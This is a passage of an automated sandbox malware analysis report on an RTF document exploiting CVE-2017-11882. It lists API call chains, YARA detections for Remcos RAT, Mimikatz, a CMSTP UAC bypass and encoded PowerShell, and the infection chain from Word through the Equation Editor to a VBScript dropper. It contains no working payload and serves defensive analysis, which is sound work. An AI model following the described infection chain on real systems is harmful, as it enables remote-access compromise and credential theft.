                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167EF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00265F188_2_00265F18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0026EFB88_2_0026EFB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0026908F8_2_0026908F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002689608_2_00268960
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0026895D8_2_0026895D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00268C088_2_00268C08
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00268C188_2_00268C18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0026E6088_2_0026E608
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00265F088_2_00265F08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043706A9_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004140059_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E11C9_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004541D99_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004381E89_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041F18B9_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004462709_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E34B9_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004533AB9_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0042742E9_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004375669_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043E5A89_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004387F09_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043797E9_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004339D79_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044DA499_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427AD79_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041DBF39_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00427C409_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00437DB39_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00435EEB9_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043DEED9_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00426E9F9_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100171949_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1000B5C19_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B04013_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043610D13_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044731013_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044A49013_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040755A13_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043C56013_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B61013_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044D6C013_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004476F013_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044B87013_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044081D13_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041495713_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004079EE13_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407AEB13_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044AA8013_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00412AA913_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404B7413_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404B0313_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044BBD813_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404BE513_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404C7613_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00415CFE13_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00416D7213_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00446D3013_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00446D8B13_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00406E8F13_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040503814_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041208C14_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004050A914_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040511A14_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043C13A14_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004051AB14_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044930014_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040D32214_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A4F014_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043A5AB14_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041363114_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044669014_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A73014_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004398D814_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004498E014_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044A88614_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DA0914_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00438D5E14_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449ED014_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041FE8314_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00430F5414_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004050C215_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004014AB15_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040513315_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004051A415_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040124615_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040CA4615_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040523515_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004032C815_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040168915_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402F6015_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 43 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@29/20@3/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7B1J99
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7E81.tmpJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.405242664.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfReversingLabs: Detection: 39%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
